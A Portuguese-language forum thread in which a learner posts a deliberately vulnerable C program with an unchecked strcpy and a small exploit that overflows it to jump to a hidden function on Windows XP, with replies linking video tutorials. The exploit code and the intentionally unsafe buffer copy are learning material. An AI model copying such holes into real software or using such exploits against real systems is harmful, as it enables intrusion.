Eae
To testando aqui o white paper q achei nesse forum sobre stack buffer overflow com WINXP e SP1
Tenho conhecimentos basicos sobre asm e c, e conhecimentos avançados em linguagem de alto nivel pra outros fins.
Gostaria de fazer na pratica esse teste, pq na teoria ja entendi como funciona, tenho q redirecionar o fluxo do processador pra desviar o programa pra outra função no exemplozinho bem basico.
Olhem o codigo q estou testando:
vuln.c
#include <stdio.h>
void show_pass (){
char *password[] = {
"Email: test@testing.com \n",
"Pass : this_is_a_test"
};
}
main (int argc, char **argv){
char buffer[16]; // <-- Portal da felicidade
strcpy (buffer, argv[1]); // <-- Nosso bombom
}
agora o programa q desvia o fluxo do processador:
exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#define RET "\x90\x12\x40\x00"
main (){
printf ("Sending exploit, please wait...\r\n\r\n");
// A funcao WinExec executa um programa e passa parametros ao mesmo.
WinExec ("\\vuln.exe yesAAAAAAAAAAAAADDDDDDDDBBBB\x90\x12\x40\x00", 0);
exit (0);
}
no caso esse exploit explora o programa de cima, enchendo de porcaria a stack até sobreescrever o endereço de retorno com o endereço de memória da função q nao é executada q obtive dissassemblando com o gdb.
O que está errado? mesmo o WinXP com SP1 tem alguma segurança contra execução de dados?
mesmo disassemblando o programa vulneravel com o Windows 7 o gdb apresentou o mesmo endereço de memória no tutorial.
Testei o exploit acima não somente como no XP SP1 como no SP2 e outra maquina nao obtive sucesso.
O tutorial do White Shark sobre head spray funcionou certinho no XP com SP2
Gostaria muito q o pessoal aí pudesse me dar uma luz nesse exemplo. Ta phoda!
Falow
consegui!!!!!!!!
um cara do IRC me ajudou! :P
Eu conheço esses exemplos ai eheheh. Enfim, acho que o paper de onde voce tirou isso nao explicava sua pergunta, mas pega ai o video:
http://www.hunterhacker.xpg.com.br/Stack_Overflow.part01.rar (http://www.hunterhacker.xpg.com.br/Stack_Overflow.part01.rar)
http://www.hunterhacker.xpg.com.br/Stack_Overflow.part02.rar (http://www.hunterhacker.xpg.com.br/Stack_Overflow.part02.rar)
Eh do mesmo autor =7 E o SP2 nao tem DEP.
[]'s